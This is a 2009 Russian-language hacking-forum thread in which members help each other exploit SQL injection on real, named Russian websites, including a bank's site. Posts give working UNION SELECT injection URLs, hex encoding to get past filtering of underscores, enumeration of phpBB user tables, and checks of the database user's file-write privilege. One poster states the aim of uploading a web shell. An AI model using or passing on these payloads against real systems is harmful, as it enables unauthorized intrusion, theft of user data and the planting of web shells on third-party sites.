Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Qam

    Qam New Member

    Joined:
    16 Jan 2009
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    Такую же ошибку(почти) могу вызвать в другом скрипте про limit там вот что:
    t.topic_last_post_id DESC LIMIT -30, 30

    Line : 273
    File : viewforum.php
     
  2. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    не по сабжу

    инжект в лимит ВОЗМОЖЕН, много раз уже упоминалось.
     
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Только не после ордера :)
     
    1 person likes this.
  4. Qam

    Qam New Member

    Joined:
    16 Jan 2009
    Messages:
    30
    Likes Received:
    3
    Reputations:
    0
    Значит инъекция не возможна?Щас толька ссылка была недавно уже нет!Толи автор удалил свой пост толи мне выспаться нужно!Если автор удалил можешь дать почитать?
     
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Qam Инъекция в лимите после ORDER BY невозможна, я думал ответ на твой вопрос дан
     
  6. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    2 Qam
     
    1 person likes this.
  7. MirA

    MirA Member

    Joined:
    24 Jul 2008
    Messages:
    25
    Likes Received:
    16
    Reputations:
    0
    Уважаемые всеведущие гуру андеграундного мира,позвольте обратиться к вам с простым но ацки актуальным вопросом,что делать,если фильтруется "_" а все таблички с префиксом?)
     
  8. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Боюсь отвечать на Ваш вопрос , во избежании причисления меня к "всеведущим гуру андеграундного мира" :)

    По теме: дать ссылку
     
  9. MirA

    MirA Member

    Joined:
    24 Jul 2008
    Messages:
    25
    Likes Received:
    16
    Reputations:
    0
    http://www.rncb.ru/print_view.php?id=450&fpath=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+--+
     
  10. prescott

    prescott Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    132
    Likes Received:
    43
    Reputations:
    5
    используй HEX для кодирования имен таблиц. То есть у себя на компе делаешь
    Code:
    SELECT HEX('tablename')
    и результат подставляешь в запрос, не забыв подставить 0x в начало.. Получится чтото вроде 0x35E45F337D
     
  11. geforce

    geforce Member

    Joined:
    21 Aug 2008
    Messages:
    300
    Likes Received:
    26
    Reputations:
    -5
    помогите разобраться!
    вот раскрутил скулу:
    http://15rus.ru/txt.php?cat=-3+union+select+0,table_name,2,3,4,5,6,7,8+from+information_schema.tables/**/
    хочу залить shell через форум!
    http://15rus.ru/forum/

    Не могу понять где здесь таблицы форума???
     
  12. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    582
    Reputations:
    256
    По форуму видно, что это phpbb. Какая версия я хз, с этим форумом мало знаком. Вот 3 таблицы:
    http://15rus.ru/txt.php?cat=-3+union+select+0,table_name,2,3,4,5,6,7,8+from+information_schema.tables+where+table_name+like+0x257068706262257573657273--
    какая-то из них нужная.
    зы: админы того сайта просто ппц - кучу софта понаставили, помойка просто)
     
  13. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    или же просто используете php функцию =)

    echo "0x".bin2hex("что надо захекстить");
     
  14. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    1. Есть туча сайтов, которые хексят.
    2. Вы вообще ссылку смотрели?
    3. Есть табла mysql.user.. но...
     
    1 person likes this.
  15. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    MirA
    Забавно, действительно фильтрация "_"
    Есть очень большая вероятность того, что user под которым работает база, file_priv=Y
    http://www.rncb.ru/print_view.php?id=450&fpath=-2+union+select+1,2,3,UNHEX(HEX(user())),5,6,7,8,9,10,11,12,13+from+mysql.user+--+
    root@localhost

    Прочитать файлы мы не сможем, т.к LOAD_FILE, и посмотреть тоже , т.к file_priv, а вот записать ... :)

    Тоесть ищем папку на запись, и пробуем :)

    PS
    prescott,wildshaman Зачем вообще это писать?
     
    3 people like this.
  16. MirA

    MirA Member

    Joined:
    24 Jul 2008
    Messages:
    25
    Likes Received:
    16
    Reputations:
    0
    Скажите что за ошибка 1 - Can't create/write to file '/home/localhost/www/1.txt' (Errcode: 2)
    з.ы. в гугл не посылать,парсил)
     
  17. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    "Errcode 2" означает, что папка не существует.

    Путь сам что-ли придумывал? ^^
     
    #4657 R1dex, 16 Jan 2009
    Last edited: 16 Jan 2009
  18. _evgeniy_

    _evgeniy_ Member

    Joined:
    7 Sep 2008
    Messages:
    25
    Likes Received:
    11
    Reputations:
    5
    нет прав на запись или путь не правильный
     
  19. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Нет прав - это "Errcode: 13"
     
    #4659 R1dex, 16 Jan 2009
    Last edited: 16 Jan 2009
    1 person likes this.
  20. pinky07

    pinky07 Member

    Joined:
    2 Jan 2009
    Messages:
    55
    Likes Received:
    34
    Reputations:
    6
    Помогите пожалуйста разобраться, вот нашел иньекцию http://www.rfrap.ru/site/index.php?p=16;'
    при попытке подобрать количество полей вылезает
    подозреваю, что это 3 версия мускуля и похоже blind SQL-injection, а так вообще хз, просто я никогда не встречался с этим....
     
Thread Status:
Not open for further replies.